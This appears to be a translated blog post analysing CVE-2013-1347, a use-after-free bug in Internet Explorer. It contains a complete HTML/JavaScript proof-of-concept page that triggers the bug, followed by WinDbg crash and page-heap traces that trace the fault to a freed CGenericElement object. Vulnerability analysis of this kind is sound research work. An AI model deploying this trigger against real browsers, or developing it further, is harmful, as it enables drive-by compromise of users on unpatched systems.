CVE-2013-1347: Microsoft IE CGenericElement Use-After-Free Vulnerability

It has been a long time since I analysed a vulnerability, and the book "Vulnerability Warfare" (《漏洞战争》) has been stalled for a long time too. Lately I have not set myself any tasks, so let's analyse this one. It looks rather long, but let's see whether it can be done more simply.

The "watering hole" attack incident

A hacker compromises a website that the target group visits frequently and plants the attack code there, successfully "killing with a borrowed knife", haha.

Vulnerability analysis

Environment

Windows 7 SP1 32-bit
WinDbg
IDA

PoC

<!doctype html> <!-- required -->
<HTML>
<head>
</head>
<body>
<ttttt:whatever id="myanim"/><!-- required format -->
<script>
f0=document.createElement('span');
document.body.appendChild(f0);

f1=document.createElement('span');
document.body.appendChild(f1);

f2=document.createElement('span');
document.body.appendChild(f2);

document.body.contentEditable="true";
f2.appendChild(document.createElement('datalist')); //has to be a data list
f1.appendChild(document.createElement('table')); //has to be a table

try{
f0.offsetParent=null; //required
}catch(e){ }

f2.innerHTML=""; //required
f0.appendChild(document.createElement('hr')); //required
f1.innerHTML=""; //required
CollectGarbage();
</script>
</body>
</html>

Open the PoC in IE, attach WinDbg, and allow the blocked content:

0:013> g
ModLoad: 69b60000 69c12000 C:\Windows\System32\jscript.dll
(e34.660): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=659d017a ebx=004bec08 ecx=0049c2e0 edx=00000000 esi=0268e8f0 edi=00000000
eip=00000000 esp=0268e8c0 ebp=0268e8dc iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
00000000 ?? ???
0:005> kv
ChildEBP RetAddr Args to Child
WARNING: Frame IP not in any known module. Following frames may be wrong.
0268e8bc 65b8c407 65bb5961 0268ec0c 004bec08 0x0
0268e8c0 65bb5961 0268ec0c 004bec08 00000000 mshtml!CElement::Doc+0x7 (FPO: [0,0,0])
0268e8dc 65bb586d 004bec08 0268ec0c 004bec08 mshtml!CTreeNode::ComputeFormats+0xba
0268eb88 65bba12d 004bec08 004bec08 0268eba8 mshtml!CTreeNode::ComputeFormatsHelper+0x44
0268eb98 65bba0ed 004bec08 004bec08 0268ebb8 mshtml!CTreeNode::GetFancyFormatIndexHelper+0x11
0268eba8 65bba0d4 004bec08 004bec08 0268ebc4 mshtml!CTreeNode::GetFancyFormatHelper+0xf
0268ebb8 65a3b9c4 004bec08 0268ebd4 65a3ba2c mshtml!CTreeNode::GetFancyFormat+0x35
0268ebc4 65a3ba2c 00000000 004bec08 0268ebe4 mshtml!ISpanQualifier::GetFancyFormat+0x5a
0268ebd4 65aac009 00000000 0044e908 0268ec1c mshtml!SLayoutRun::HasInlineMbp+0x10
0268ebe4 65abb4e5 00000000 00000000 0044e908 mshtml!SRunPointer::HasInlineMbp+0x56

EIP has become 0x00000000, and the stack does not reveal much either.

Enable page heap:

gflags.exe /i iexplore.exe +hpa

This time the fault is on the mov instruction:

0:013> g
ModLoad: 6a640000 6a6f2000 C:\Windows\System32\jscript.dll
(d5c.a94): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=669b5100 ebx=079d2fb0 ecx=082d1fc8 edx=00000000 esi=045eee50 edi=00000000
eip=6663c400 esp=045eee24 ebp=045eee3c iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
mshtml!CElement::Doc:
6663c400 8b01 mov eax,dword ptr [ecx] ds:0023:082d1fc8=????????

Let's look at the attributes of this address:

0:005> !heap -p -a ecx
address 082d1fc8 found in
_DPH_HEAP_ROOT @ 151000
in free-ed allocation ( DPH_HEAP_BLOCK: VirtAddr VirtSize)
8360b60: 82d1000 2000
6c3a90b2 verifier!AVrfDebugPageHeapFree+0x000000c2
77465674 ntdll!RtlDebugFreeHeap+0x0000002f
77427aca ntdll!RtlpFreeHeap+0x0000005d
773f2d68 ntdll!RtlFreeHeap+0x00000142
7753f1ac kernel32!HeapFree+0x00000014
664cb9a8 mshtml!CGenericElement::`vector deleting destructor'+0x0000003d
66647dd0 mshtml!CBase::SubRelease+0x00000022
6663c482 mshtml!CElement::PrivateRelease+0x0000002a
6663b034 mshtml!PlainRelease+0x00000025
6669669d mshtml!PlainTrackerRelease+0x00000014
6a64a6f1 jscript!VAR::Clear+0x0000005f
6a666d66 jscript!GcContext::Reclaim+0x000000b6
6a664309 jscript!GcContext::CollectCore+0x00000123
6a6c8572 jscript!JsCollectGarbage+0x0000001d
6a6574ac jscript!NameTbl::InvokeInternal+0x00000141
6a654ea4 jscript!VAR::InvokeByDispID+0x0000017f
6a65e3e7 jscript!CScriptRuntime::Run+0x00002b80
6a655c9d jscript!ScrFncObj::CallWithFrameOnStack+0x000000ce
6a655bfb jscript!ScrFncObj::Call+0x0000008d
6a655e11 jscript!CSession::Execute+0x0000015f
6a65612a jscript!COleScript::ExecutePendingScripts+0x000001bd
6a65c2d9 jscript!COleScript::ParseScriptTextCore+0x000002a4
6a65c0f1 jscript!COleScript::ParseScriptText+0x00000030
665f68c7 mshtml!CScriptCollection::ParseScriptText+0x00000218
665f66bf mshtml!CScriptElement::CommitCode+0x000003ae
665f6c35 mshtml!CScriptElement::Execute+0x000000c6
665d82b5 mshtml!CHtmParse::Execute+0x0000004a
665b77cf mshtml!CHtmPost::Broadcast+0x0000000f
665b7f36 mshtml!CHtmPost::Exec+0x000005f7
665b8a99 mshtml!CHtmPost::Run+0x00000015
665b89fd mshtml!PostManExecute+0x000001fb
665b7c66 mshtml!PostManResume+0x000000f7

We can see "in free-ed allocation": this memory has already been freed, an obvious UAF.

Looking further, we can see mshtml!CGenericElement::`vector deleting destructor', which confirms that this is the object being used after it was freed.
